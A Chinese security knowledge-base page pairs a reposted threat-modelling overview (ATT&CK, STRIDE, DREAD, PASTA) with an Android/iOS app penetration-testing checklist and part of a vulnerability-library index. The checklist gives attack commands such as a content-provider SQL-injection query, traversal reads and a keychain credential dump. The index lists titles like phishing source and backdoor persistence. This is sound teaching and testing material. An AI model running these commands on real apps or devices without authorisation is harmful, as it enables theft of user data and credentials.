[Vulwiki](https://ares-x.com/wiki#/) （基于零组漏洞库）

[亮神专辑，全部收录到博客，方便自己和墙内用户查看 - lsh4ck's Blog](https://www.lshack.cn/156/) （各种姿势）

[干货集中营-算命縖子](http://www.nmd5.com/test/index.php) （精选好文）

[星际黑客](https://www.xj.hk/) （聚合平台）

[MITER ATT＆CK™分析：Jai Minton](https://www.jaiminton.com/mitreatt\&ck)

<https://blog.csdn.net/God_XiangYu> （各种姿势）

[安全马克](https://aq.mk/)

[代码审计\]知识星球](https://zsxq.tricking.io/) （技能提升）

[Web安全学习笔记](https://websec.readthedocs.io/zh/latest/index.html)（系统学习）

[CTF Wiki](https://wiki.x10sec.org/)（细节+总结）

[斗象能力中心](https://blog.riskivy.com/)（漏洞分析+弹药库）

[蚂蚁宝库](https://qianxiao996.cn/wenzhang/)（公众号-聚合平台）

[PayloadsAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings) （Payload集合）

[Hack Inn](https://www.hackinn.com/) （安全大会议题ppt集合）


# ATT\&CK威胁建模

尊重原创，转载自安全牛https\://www\.aqniu.com/learn/67034.html

## 理论依据

[ATTACK-Tools](https://github.com/nshalabi/ATTACK-Tools)

[ATTCK-PenTester-Book](https://github.com/Dm2333/)

[ATTCK中文网](https://huntingday.github.io/)

[ATTCK官网](https://attack.mitre.org/)

## 建模工具

了解威胁建模框架、方法和工具可以帮你更好地识别、量化和排序面临的威胁。

威胁建模是一个结构化的过程，IT专业人员可以通过该过程识别潜在的安全威胁和漏洞，量化每个威胁的严重性，并确定技术的优先级以缓解攻击并保护IT资产。

这个宽泛的定义听起来可能像是网络安全专业人员的职位描述，但是威胁模型的重要之处在于它是系统的和结构化的。威胁建模人员将执行一系列具体步骤，以全

面了解他们试图保护的IT环境，识别漏洞和潜在攻击者。

总的来说，威胁建模在某种程度上仍然是科学和艺术的综合体，并没有单一的威胁建模过程规范。威胁建模的实践借鉴了各种早期的安全实践，最著名的是1990

年代开发的“ 攻击树 ” 的概念。1999年，Microsoft员工Loren Kohnfelder和Praerit Garg在公司内部分发了一份名为“ 我们产品的威胁 ” 的文件¹，该文件被许多人

认为是威胁建模的第一个明确描述。

Kohnfelder和Garg将他们的建议称为“ STRIDE框架”，我们将在本文后面详细讨论它的细节。如今我们已经拥有各种各样的威胁建模框架和方法，这些模型侧重点

不同，其中一些模型针对特定安全技术领域，例如，应用程序安全。在本文中，我们将帮助您了解所有这些方法的共同点，以及哪种特定的技术可能适合您。

## 威胁建模流程和步骤

每种的威胁建模方法都包含一系列步骤，我们将在本文后面的部分中讨论每个步骤的细微差别。首先，我们将看一下所有这些方法共有的基本逻辑流程。对威胁建

模过程最简洁明了的概述之一来自软件工程师Goran Aviani，他指出威胁模型的目的是回答四个问题：

1. 我们面对的是什么？
2. 可能会有哪些问题（威胁）？
3. 我们该怎么做？
4. 我们做得好吗？

反过来，威胁建模过程应包括四个主要步骤，每个步骤都会为这些问题之一提供答案。

1. 分解应用程序或基础架构
2. 确定威胁
3. 确定对策和缓解措施
4. 排序威胁

为了准确了解这些步骤中的每个步骤，我们需要讨论构成威胁建模基础的特定技术。

## 威胁建模技术

上面列出的步骤中，最陌生的术语可能是**分解（Decompose）**。分解应用程序或基础架构意味着什么？软件工程师Andrea Della Corte认为，广义上讲，分解

应用程序包括“了解应用程序及其与外部实体的交互方式。这涉及创建用例，以了解应用程序的使用方式，确定入口点以查看潜在的攻击者可以在哪里与应用程序

进行交互，确定资产（即攻击者可能会感兴趣的项目/区域），并标识表示应用程序将授予外部实体的访问权限的信任级别。” （他在这里专门谈论应用程序安全

性，但是显然，从广义上讲，这也适用于对基础结构的看法。）

分解应用程序的一种技术是构建**数据流程图**。这是1970年代开发的一种方法，以可视方式展示数据如何在应用程序或系统中移动，以及各个组件在何处更改或

存储数据。其中**信任边界**是在2000年代初期添加进来的概念，特指数据流中的卡点，在该点上需要对数据进行验证，然后数据才能被接收该数据的实体使用。信

任边界是用数据流程图进行威胁建模的关键。

### 在线银行应用的数据流程图示例

下图是在线银行应用程序的数据流程图；虚线表示信任边界，数据可能会在信任边界被更改，因此需要采取安全措施。

![网上银行应用程序的数据流程图（作者为Wei Zhang和Marco Morana，以OWASP许可分发）](https://3720283288-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MFJRZX6Th5SswHpXXMy%2F-MU2nk0sfygFZ4GEzgD4%2F-MU2oWzeQrosqRPE6UAN%2F2-14.png?alt=media\&token=ead6c5de-5088-4c5c-ae69-4647423999d4)

网上银行应用程序的数据流程图（作者为Wei Zhang和Marco Morana，以OWASP许可分发）

更深入的数据流程图威胁建模方法可以参考微软的这个文档²。

由于数据流程图是由系统工程师而不是安全专家开发的，因此它们包含了许多威胁建模不需要的开销。数据流程图的一种替代方法是过程流程&#x56FE;*。*&#x4E24;者在总体概念

上相似，但后者更加精简，并且侧重于用户和执行代码在系统中的移动方式，更紧密地反映了攻击者的思维方式（例如下图）。

![](https://3720283288-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MFJRZX6Th5SswHpXXMy%2F-MU2nk0sfygFZ4GEzgD4%2F-MU2ol_iBdbzPKgf6oMA%2F3-6.jpg?alt=media\&token=ad3aad32-4231-4c1a-8da9-ca23ede4b316)

绘制攻击树也是一种威胁建模技术，当您确定要对应用程序或基础结构潜在威胁的阶段时，它就变得非常重要。攻击树由90年代后期的信息安全传奇人物布鲁斯·

施耐尔（Bruce Schneier）开创。它们由代表不同事件的一系列父节点和子节点组成，子节点是必须满足的条件才能使父节点为真。根节点（图中的最高父节点）

是攻击的总体目标。借助攻击树，威胁建模者可以看到必须组合哪些情况才能使威胁成功。下图显示了一个简单的银行应用攻击树，说明了病毒可能成功感染文件

的不同方式。

![](https://3720283288-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MFJRZX6Th5SswHpXXMy%2F-MU2nk0sfygFZ4GEzgD4%2F-MU2orzKa3-__aoRyj0P%2F4-5.png?alt=media\&token=5cc356b3-02c2-4a6d-9ba5-c5614d4405d3)

下图是Hackinthebox从攻击者的角度构建的攻击树示例，可以帮助您了解自己所面临的威胁。

![](https://3720283288-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MFJRZX6Th5SswHpXXMy%2F-MU2nk0sfygFZ4GEzgD4%2F-MU2ow-ivAUKoeBrdxti%2F5-5.png?alt=media\&token=a2332a2a-64d1-42a5-b148-0f0ca9f3da8b)

确定对策和对威胁进行排序的技术因框架或方法不同而相差较大，详细介绍如下：

## 威胁建模框架和方法

威胁建模的各种结构化方法通常称为*框架*或*方法论*（本文中这两个术语基本上可以互换使用）。目前的威胁建模框架和方法有很多，我们挑几个最流行的介绍如下：

### 7种顶级威胁建模方法

1. STRIDE
2. DREAD
3. PASTA
4. VAST
5. Trike
6. OCTAVE
7. NIST

### **STRIDE威胁建模**

如上所述，STRIDE是威胁建模的祖父，最早于90年代末在Microsoft开发。STRIDE代表六种威胁，每种都对CIA三要素构成威胁，具体如下：

* **欺骗**或冒充他人或计算机，影响真实性
* **篡改**数据，这会**破坏**完整性
* **抵赖**，或无法将执行的操作关联到操作者，这违反了不可抵赖性
* **信息泄露**，违反机密性
* **拒绝服务**，这违反了可用性
* **特权提升**，违反授权

### **DREAD威胁建模**

DREAD被认为是STRIDE模型的一个附加组件，该模型使建模人员可以在确定威胁后对其进行排名。对于每个潜在威胁，DREAD代表六个问题：

* **潜在损害**：如果利用漏洞，造成的损害有多大？
* **重现性**：重现攻击有多容易？
* **可利用性**：发动攻击有多容易？
* **受影响的用户**：大概影响了多少用户？
* **可发现性**：查找漏洞有多容易？

这些问题中的每一个都得到1-3分的评分。

### **PASTA威胁建模**

PASTA代表攻击模拟和威胁分析过程，它是一个七步骤过程，致力于使技术安全要求与业务目标保持一致。每个步骤都非常复杂，由几个子步骤组成，但是总体顺

序如下：

1. 定义目标
2. 定义技术范围
3. 应用程序分解
4. 威胁分析
5. 漏洞和弱点分析
6. 攻击建模
7. 风险与影响分析

### **VAST威胁建模**

VAST代表可视化，敏捷威胁建模。该模型是 ThreatModeler（自动威胁建模平台）的基础，该平台可以区分应用程序和运营威胁模型。VAST专为集成到围绕

devops构建的工作流中而设计。

### **Trike威胁建模**

Trike是用于威胁建模和风险评估的框架的开源工具，它基于防御的角度，而不是试图模仿攻击者的思维过程。使用Trike，您可以为要防御的系统建模，并通过

CRUD的角度评估每个组件，也就是说，谁可以创建，读取，更新或删除该实体。通过遍历数据流程图来识别威胁，每种威胁仅分为两类：拒绝服务或特权提升。

### **OCTAVE威胁建模**

OCTAVE代表“运营关键威胁，资产和脆弱性评估”，是卡耐基梅隆大学开发的一种威胁建模方法，其重点是组织风险而不是技术风险。它包括三个阶段：

1. 建立基于资产的威胁配置文件
2. 识别基础架构漏洞
3. 制定安全策略和计划

### **NIST威胁建模**

美国国家标准技术研究院拥有自己的以数据为中心的威胁建模方法，该方法包括四个步骤：

1. 系统和数据识别和表征
2. 识别并选择要包含在模型中的攻击媒介
3. 表征缓解攻击媒介的安全控件
4. 分析威胁模型

该NIST草案还包括一个方法的具体应用实例。如果您正在寻找**威胁建模示例**，那么这是一个很棒的文档，可以阅读该文档以了解流程如何工作。

## 威胁建模最佳实践

无论选择哪种框架，都应遵循一些实践方法。但最重要的（通常也是很难做到的）是将威胁建模作为系统开发过程中的优先事项。如果能在项目开发伊始就做到这

一点，以后可以省去很多麻烦，因为安全性可以被深深“植入”到应用程序或系统中。

另一个最佳实践是不要将应用程序和系统彼此隔离。Michael Santarcangelo写道： “如果各种威胁模型以相同的方式相互连接，并且应用程序和组件作为IT系统的

一部分进行交互，那么结果将是一个全面的攻击面，CISO可以使用该攻击面来理解整个企业的整体威胁组合。”

我们还敦促您避免常见的威胁建模错误。简而言之：不要过于关注头条新闻上的威胁；不要忘记，您的用户可能是所有人中最大的无意威胁。并且不要忘记，威胁

模型应该是“活着”的文档，并且需要不断更新。

## 威胁建模工具

需要指出的是，上面列出的两种方法（VAST和Trike）实际上是围绕特定的软件工具构建的。还有一些支持其他方法的工具，例如，Microsoft提供了免费的威胁建

模工具，而OWASP Foundation也推出了自己的桌面和web版本的威胁建模工具——Threat Dragon³。

实际上，这里描述的许多方法都是概念性的，并未与任何软件联系在一起。攻击树或数据流程图可以用笔和纸绘制。正如Luca Bongiorni的演讲所解释的那样，用

于威胁建模的一些最受欢迎的工具是Microsoft Visio和Excel。开始为基础架构进行威胁建模的门槛很低，但回报却很高。

## 参考资料：

### **【1】最早的威胁建模论文：**

<https://www.microsoft.com/security/blog/2009/08/27/the-threats-to-our-products/>

### **【2】Uncover Security Design Flaws Using The STRIDE Approach：**

<https://docs.microsoft.com/en-us/archive/msdn-magazine/2006/november/uncover-security-design-flaws-using-the-stride-approach>

### **【3】OWASP威胁建模工具：**

Threat Dragon：<https://owasp.org/www-project-threat-dragon/>


# APP分析


# Android&\&IOS APP渗透测试方法checklist

## 渗透测试环境搭建(iOS\&Android)

| 硬件环境                      |                                                            |                            |
| ------------------------- | ---------------------------------------------------------- | -------------------------- |
| Android设备（需root）（虚拟机也可以)  |                                                            |                            |
| iOS设备（需越狱）                |                                                            |                            |
| 网络环境                      |                                                            |                            |
| 没有特别要求                    |                                                            |                            |
| 操作系统环境                    |                                                            |                            |
| Mac+Xcode操作环境             |                                                            |                            |
| Linux或Unix环境              |                                                            |                            |
| Android软件环境               |                                                            |                            |
| 类型                        | 名称                                                         | 备注                         |
| android开发环境               | JDK                                                        |                            |
| Android SDK               |                                                            |                            |
| Eclipse                   |                                                            |                            |
| 网络分析工具                    | burpsuite免费版                                               | 对于自定义协议，虚拟设备只能异步抓取数据包      |
| charles                   |                                                            |                            |
| wireshark                 |                                                            |                            |
| 逆向分析工具                    | baksmali/smali                                             |                            |
| apktool                   |                                                            |                            |
| virtuous ten studio       |                                                            |                            |
| dex2jar                   |                                                            |                            |
| Java Decompiler           |                                                            |                            |
| apk-extractor             |                                                            |                            |
| 签名工具                      | keytool/jarsigner                                          |                            |
| signapk                   |                                                            |                            |
| 资源编辑工具                    | AndroidResEdit                                             |                            |
| 权限分析工具                    | manitree                                                   |                            |
| 动态分析工具                    | DroidBox                                                   | 需要运行在非windows环境下           |
| APIMonitor                | 需要运行在非windows环境下                                           |                            |
| 静态分析工具                    | APKInspector                                               | 需要运行在非windows环境下           |
| otertool                  | 需要运行在非windows环境下                                           |                            |
| ApkAnalyser               |                                                            |                            |
| APK改之理                    |                                                            |                            |
| 安全审计集成工具                  | Androguard                                                 | 需要运行在非windows环境下           |
| mercury                   |                                                            |                            |
| sec-distros               | santoku                                                    | 需虚拟机运行                     |
| 在线加固，评测                   | 梆梆<http://www.bangcle.com/>                                |                            |
| 其他APK工具                   | Busybox                                                    |                            |
| 在线分析                      | <http://mobilesandbox.org/> <http://fireeye.ijinshan.com/> |                            |
| iOS软件环境                   |                                                            |                            |
| 类型                        | 名称                                                         | 备注                         |
| 文件系统管理工具                  | iTunes                                                     |                            |
| iTools                    |                                                            |                            |
|                           | iPhone Configuration Utility                               |                            |
| plist编辑工具                 | plisteditor                                                |                            |
| sqlite3编辑器                | SQLite Database brower                                     |                            |
| Cookies.binarycookies读取工具 | BinaryCookieReader.py                                      |                            |
| keychain查看工具              | keychain dumper                                            | 需越狱设备                      |
| 文件系统监控工具                  | filemon.iOS                                                | 需越狱设备                      |
| 文件加密类型检测工具                | FileDP                                                     | 需越狱设备                      |
| socket连接监控                | lsock                                                      | 需越狱设备，只有源码，需编译成arm版本的二进制文件 |
| SSH（为了便于操作）               | SecureCRT                                                  |                            |
| openssh,openssl           | 需越狱设备                                                      |                            |
| 网络分析                      | wireshark                                                  | 需网段互通                      |
| BurpSuite                 |                                                            |                            |
| Charles                   |                                                            |                            |
| Fiddler                   |                                                            |                            |
| rvictl                    | mac上的工具                                                    |                            |
| ssl kill switch           | 需越狱设备                                                      |                            |
| trustme                   | 需越狱设备                                                      |                            |
| tcpdump                   | 需越狱设备                                                      |                            |
| 逆向分析工具                    | otool                                                      |                            |
| class-dump-z              | 需越狱设备                                                      |                            |
| Clutch                    | 需越狱设备                                                      |                            |
| flex                      | 需越狱设备                                                      |                            |
| cycript                   | 需越狱设备                                                      |                            |
| removePIE                 | 需越狱设备                                                      |                            |
| IDA                       | 需收费，破解版会被杀毒软件删除                                            |                            |
| Hopper                    | mac上的工具                                                    |                            |
| 修改内存                      | gameplayer                                                 | 需越狱设备                      |
| iGameGuardian             | 需越狱设备                                                      |                            |
| 内购破解                      | IAPFree                                                    | 需越狱设备                      |
| LocalIAPStore             | 需越狱设备                                                      |                            |
| 越狱检测绕过                    | xCon                                                       | 需越狱设备                      |
| 安全审计                      | iAuditor                                                   | 需越狱设备                      |

## mobile渗透测试常用命令方法(iOS\&Android)

| 前期准备                                                           | 使用模拟器安装Android应用                                                                                                       |                                                                                     |
| -------------------------------------------------------------- | ---------------------------------------------------------------------------------------------------------------------- | ----------------------------------------------------------------------------------- |
| 步骤：                                                            | 说明                                                                                                                     | 命令方法                                                                                |
| 1                                                              | 列出当前安装的android API包，查看对应的id号                                                                                           | android list target                                                                 |
| 2                                                              | 创建android虚拟设备                                                                                                          | android create avd –n test2（avd名字） -t 12（对应的id号）                                    |
| 3                                                              | 查看已有的android虚拟设备                                                                                                       | android list avd                                                                    |
| 4                                                              | 创建SD卡（这步可以省略，对有些应用而言，需要）                                                                                               | mksdcard 64M \~/dani（存放路径）                                                          |
| 5                                                              | 使用模拟器打开第2步创建的设备                                                                                                        | emulator -avd test2（avd名称） -sdcrad \~/dani（SD卡存放路径） -partition-size 256 -memory 512 |
| 6                                                              | 查看处于运行状态的android设备                                                                                                     | adb devices                                                                         |
| 7                                                              | 下载安装android应用                                                                                                          | adb install ctrip\_std.apk(apk名字）                                                   |
|                                                                |                                                                                                                        |                                                                                     |
| 渗透测试点                                                          | 网络通信分析之HTTP通信                                                                                                          |                                                                                     |
| 步骤：                                                            | 说明                                                                                                                     |                                                                                     |
| 1                                                              | 配置HTTP代理工具，以BurpSuite为例，proxy-options                                                                                  |                                                                                     |
| 2                                                              | 配置Android设备的settings-wireless\&networks-more-Mobile networks-Access Points name-Proxy                                  |                                                                                     |
|                                                                |                                                                                                                        |                                                                                     |
|                                                                |                                                                                                                        |                                                                                     |
| 渗透测试点                                                          | 网络通信分析之socket通信                                                                                                        |                                                                                     |
| 步骤：                                                            | 说明                                                                                                                     | 命令方法                                                                                |
| 1                                                              | 使用tcpdump将设备中的应用操作引发的通信包导出，使用wireshark查看                                                                               | tcpdump -w traffic.pcap                                                             |
|                                                                |                                                                                                                        |                                                                                     |
| 渗透测试点                                                          | 权限分析                                                                                                                   |                                                                                     |
| 步骤：                                                            | 说明                                                                                                                     | 命令方法                                                                                |
| 1                                                              | 检查应用AndoridManifest.xml文件中系统权限的申请是否有安全隐患                                                                               | python manitree.py -f AndroidManifest.xml                                           |
|                                                                |                                                                                                                        |                                                                                     |
| 渗透测试点                                                          | 文件系统分析                                                                                                                 |                                                                                     |
| 步骤：                                                            | 说明                                                                                                                     | 命令方法                                                                                |
| 1                                                              | 将应用存档文件下载到PC机上，使用相应格式的编辑器进行操作                                                                                          | adb pull /data/data/ctrip.android.view/\[文件名] e:/\[文件名]                             |
|                                                                |                                                                                                                        | adb pull /sdcard/CTRIP/\[文件名] e:/\[文件名]                                             |
| 2                                                              | 检查日志信息                                                                                                                 | adb logcat                                                                          |
|                                                                |                                                                                                                        |                                                                                     |
| 渗透测试点                                                          | 静态文件分析                                                                                                                 |                                                                                     |
| 步骤：                                                            | 说明                                                                                                                     | 命令方法                                                                                |
| 1                                                              | 查看包的基本信息                                                                                                               | aapt dump badging apkfile                                                           |
|                                                                | adb shell dumpsys meminfo ctrip.android.view                                                                           |                                                                                     |
| 2                                                              | 查看证书信息                                                                                                                 | jarsigner -verify -certs -verbose apk                                               |
| 3                                                              | 反编译apk包,使用JD\_GUI查看上一步生成的ctrip\_std\_dex2jar.jar包                                                                      | dex2jar.bat e:\ctrip\_std.apk                                                       |
|                                                                |                                                                                                                        |                                                                                     |
| 4                                                              | 反汇编apk包                                                                                                                | java -jar apktool.jar d xx.apk                                                      |
| 5                                                              | 查找可执行文件dex中的URL（Other keyword）                                                                                         | strings classes.dex > ctrip\_classes\_dex grep -n http\[关键字] ctrip\_classes\_dex    |
|                                                                |                                                                                                                        |                                                                                     |
| 渗透测试点                                                          | 组件通信分析                                                                                                                 |                                                                                     |
| 步骤：                                                            | 说明                                                                                                                     | 命令方法                                                                                |
|                                                                | 1.使用mercury查看那APP的组件信息                                                                                                 | 确定包名 run app.package.list                                                           |
|                                                                | 查看指定包的基本信息，例如数据存储路径，uid，gid，permissions run app.package.info -a com.android.browser                                    |                                                                                     |
|                                                                | 列出APP中的activity组件 run app.activity.info -a com.android.browser                                                         |                                                                                     |
|                                                                | 列出APP中的service组件 run app.service.info -a com.android.browser                                                           |                                                                                     |
|                                                                | 列出APP中的Content Provider组件 run app.provider.info -a com.android.browser                                                 |                                                                                     |
|                                                                | 2.使用mercury查找APP Content Provider组件漏洞，包括组件暴露， SQL 注入，文件目录遍历                                                            | 查找可以读取的Content Provider的URI run scanner.provider.finduris -a com.sina.weibo         |
|                                                                | 读取 Content Provider指定URI中的内容 run app.provider.query content://settings/secure --selection "name='adb\_enabled'"        |                                                                                     |
|                                                                | 扫描是否存在content provider目录遍历的漏洞 run scanner.provider.traversal -a com.android.browser                                    |                                                                                     |
|                                                                | 读取content provider指定的目录 run app.provider.read content://com.mwri.fileEncryptor.localfile/system/etc/hosts/             |                                                                                     |
|                                                                | 扫描是否存在SQL注入 run scanner.provider.injection -a com.android.browser                                                      |                                                                                     |
|                                                                | 利用SQL注入 run scanner.provider.query content://com.example.bsideschallenge.evilPlannerdb --projection "\* from cards --" |                                                                                     |
|                                                                |                                                                                                                        | 查看指定包的AndroidManifest.xml文件 run app.package.manifest com.example.bsidechallenge     |
|                                                                |                                                                                                                        |                                                                                     |
| iOS APP渗透测试详解                                                  |                                                                                                                        |                                                                                     |
| 渗透测试点                                                          | IPA包静态分析                                                                                                               |                                                                                     |
| 步骤：                                                            | 说明                                                                                                                     | 命令方法                                                                                |
| 1                                                              | 解密IPA，逆向分析                                                                                                             | ssh root\@iOSdevice'sIP (或者采用usb ssh连接）                                             |
|                                                                |                                                                                                                        | clutch APPName                                                                      |
|                                                                |                                                                                                                        | class-dump-z Mach-OFileName > FileName\_classdump.h                                 |
|                                                                |                                                                                                                        | strings APPNAME                                                                     |
|                                                                |                                                                                                                        | 导出APP使用的共享库 otool -L APPBinaryName                                                  |
|                                                                |                                                                                                                        | 得到汇编代码 otool -tV Mach-OFileName > FileName\_assembledump                            |
| 渗透测试点                                                          | 文件取证分析                                                                                                                 |                                                                                     |
| 步骤：                                                            | 说明                                                                                                                     | 命令方法                                                                                |
| 1                                                              | 检查应用主目录文件/private/var/mobile/Application/\[GUID] 是否存在敏感信息泄露                                                            | iTools查看                                                                            |
| 数据库查看 sqlite3 DBName（或使用SQLite Database Browser查看）             |                                                                                                                        |                                                                                     |
| plist文件查看 plutil plistFileName（或是用plist编辑器查看）                  |                                                                                                                        |                                                                                     |
| binarycookies python BinaryCookieRead.py cookies.binarycookies |                                                                                                                        |                                                                                     |
| 2                                                              | 检查keychain-2.db数据库是否存在敏感信息                                                                                             | keychain\_dumper -g                                                                 |
| 3                                                              | 检查系统日志是否存在敏感信息泄露                                                                                                       | 使用iPhone 配置使用工具查看                                                                   |
| 4                                                              | 检测文件是否启用了数据加密（Data Protection）                                                                                         | FileDP -f FilePath                                                                  |
| 渗透测试点                                                          | APP动态行为分析                                                                                                              |                                                                                     |
| 步骤：                                                            | 说明                                                                                                                     | 命令方法                                                                                |
|                                                                | 监测文件系统的变化                                                                                                              | 运行filemon.iOS > /tmp/FileMon 启动APP,例行操作 ctrl+c结束                                    |
|                                                                | 监控文件存储，NSLog日志记录，HTTP地址，系统调用（GPS，addressbook,                                                                          | iauditor                                                                            |
|                                                                |                                                                                                                        |                                                                                     |
| 渗透测试点                                                          | 网络通信分析                                                                                                                 |                                                                                     |
| 步骤：                                                            | 说明                                                                                                                     | 命令方法                                                                                |
|                                                                | 创建设备虚拟接口，基于该虚拟接口，将移动设备上的数据引入到PC上进行分析                                                                                   | 第一步：使用USB数据线将iOS设备连接到MAC上                                                           |
|                                                                | 第二步：获得iOS设备的UDID，可以使用iTools查看，也可以使用Xcode的Organizer工具查看                                                                 |                                                                                     |
|                                                                | 第三步：创建RVI接口 rvictl -s \<UDID>                                                                                          |                                                                                     |
|                                                                | 第三步：RVI虚拟接口的命令规则可为rvi0，rvi1，。。。,创建后可以使用以下命令查看是否创建成功 ifconfig rvi0                                                      |                                                                                     |
|                                                                | 第四步：在mac上用抓包工具wireshark或tcpdump等工具抓包分析 sudo tcpdump -i rvi0 -n -vv                                                     |                                                                                     |
|                                                                | 第五步：分析结束后，移除创建的RVI接口 $ rvictl -x \<UDID>                                                                               |                                                                                     |
|                                                                |                                                                                                                        |                                                                                     |
| 渗透测试点                                                          | runtime时分析                                                                                                             |                                                                                     |
| 步骤：                                                            | 说明                                                                                                                     |                                                                                     |
|                                                                | 修改函数的实现逻辑                                                                                                              | cycript -p                                                                          |
|                                                                | 修改函数返回值                                                                                                                | flex修改函数返回值                                                                         |
|                                                                |                                                                                                                        |                                                                                     |
| 渗透测试点                                                          | IPC通信（Protocol handler）                                                                                                |                                                                                     |
| 步骤：                                                            | 说明                                                                                                                     | 命令方法                                                                                |
|                                                                | URLSchema                                                                                                              | 搜索Info.plist文件，CFBundleURLSchemes                                                   |


# Android APP渗透测试方法大全


# CMS POC

持续更新中，目前最方便的是零组


# 0-SEC---除要查询最好别打开

零组资料文库

| 1    | Web安全 | ActiveMQ                       | {'id': 5601, 'name': 'ActiveMQ 物理路径泄漏漏洞', 'pid': 3, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5601, 'title': None}                                                                               |
| ---- | ----- | ------------------------------ | ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
| 2    | Web安全 | ActiveMQ                       | {'id': 5602, 'name': '（CVE-2015-1830）ActiveMQ 路径遍历导致未经身份验证的rce', 'pid': 3, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5602, 'title': None}                                                        |
| 3    | Web安全 | ActiveMQ                       | {'id': 5603, 'name': '（CVE-2015-5254）ActiveMQ 反序列化漏洞', 'pid': 3, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5603, 'title': None}                                                                  |
| 4    | Web安全 | ActiveMQ                       | {'id': 5604, 'name': '（CVE-2016-3088）ActiveMQ应用漏洞', 'pid': 3, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5604, 'title': None}                                                                     |
| 5    | Web安全 | ActiveMQ                       | {'id': 5605, 'name': '（CVE-2017-15709）ActiveMQ 信息泄漏漏洞', 'pid': 3, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5605, 'title': None}                                                                 |
| 6    | Web安全 | Adminer                        | {'id': 5606, 'name': 'Adminers v1.1.3 （SQLite 3 写入一句话木马）', 'pid': 4, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5606, 'title': None}                                                              |
| 7    | Web安全 | Adminer                        | {'id': 5607, 'name': '（CVE-2018-7667）Adminer v4.3.1 服务器端请求伪造漏洞', 'pid': 4, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5607, 'title': None}                                                        |
| 8    | Web安全 | Adminer                        | {'id': 7133, 'name': 'Adminer 任意文件读取漏洞', 'pid': 4, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7133, 'title': None}                                                                                |
| 9    | Web安全 | Adobe ColdFusion               | {'id': 5608, 'name': '（CVE-2010-2861）Adobe ColdFusion 文件读取漏洞', 'pid': 5, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5608, 'title': None}                                                          |
| 10   | Web安全 | Adobe ColdFusion               | {'id': 5609, 'name': '（CVE-2017-3066）Adobe ColdFusion 反序列化漏洞', 'pid': 5, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5609, 'title': None}                                                          |
| 11   | Web安全 | Adobe Flash Player             | {'id': 5744, 'name': 'Flash钓鱼源码', 'pid': 48, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5744, 'title': None}                                                                                      |
| 12   | Web安全 | Adobe Flash Player             | {'id': 7142, 'name': '（CVE-2018-4878）Adobe Flash Player 远程代码执行漏洞', 'pid': 48, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7142, 'title': None}                                                     |
| 13   | Web安全 | Adobe Flash Player             | {'id': 7288, 'name': '（CVE-2018-15982）Adobe Flash Player 远程代码执行漏洞', 'pid': 48, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7288, 'title': None}                                                    |
| 14   | Web安全 | Aerospike                      | {'id': 7036, 'name': '（CVE-2020-13151）Aerospike 数据库主机命令执行漏洞', 'pid': 378, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7036, 'title': None}                                                         |
| 15   | Web安全 | Apache                         | {'id': 5610, 'name': '（CVE-2007-6750）Apache ddos', 'pid': 6, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5610, 'title': None}                                                                      |
| 16   | Web安全 | Apache                         | {'id': 5611, 'name': '（CVE-2017-15715）Apache解析漏洞', 'pid': 6, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5611, 'title': None}                                                                      |
| 17   | Web安全 | Apache                         | {'id': 5612, 'name': '（CVE-2019-0211）Apache HTTP 服务组件提权漏洞', 'pid': 6, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5612, 'title': None}                                                             |
| 18   | Web安全 | Apache                         | {'id': 5613, 'name': 'Apache后门维持', 'pid': 6, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5613, 'title': None}                                                                                      |
| 19   | Web安全 | Apache Airflow                 | {'id': 7038, 'name': '（CVE-2019-0216）Apache Airflow 储存型xss', 'pid': 375, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7038, 'title': None}                                                          |
| 20   | Web安全 | Apache Airflow                 | {'id': 7029, 'name': '（CVE-2020-11978）Apache Airflow 命令注入漏洞', 'pid': 375, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7029, 'title': None}                                                         |
| 21   | Web安全 | Apache Axis                    | {'id': 5614, 'name': '（CVE-2019-0227）Apache Axis v1.4远程代码执行', 'pid': 7, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5614, 'title': None}                                                           |
| 22   | Web安全 | Apache Cocoon XML              | {'id': 7127, 'name': '（CVE-2020-11991）Apache Cocoon XML 外部实体注入漏洞', 'pid': 408, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7127, 'title': None}                                                    |
| 23   | Web安全 | Apache DolphinScheduler        | {'id': 7114, 'name': '（CVE-2020-11974）Apache DolphinScheduler 远程代码执行漏洞', 'pid': 403, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7114, 'title': None}                                              |
| 24   | Web安全 | Apache Dubbo                   | {'id': 5615, 'name': '（CVE-2019-17564）Apache Dubbo 反序列化漏洞', 'pid': 8, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5615, 'title': None}                                                             |
| 25   | Web安全 | Apache Dubbo                   | {'id': 6756, 'name': '（CVE-2020-1948）Apache Dubbo Hessian 反序列化漏洞', 'pid': 8, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6756, 'title': None}                                                      |
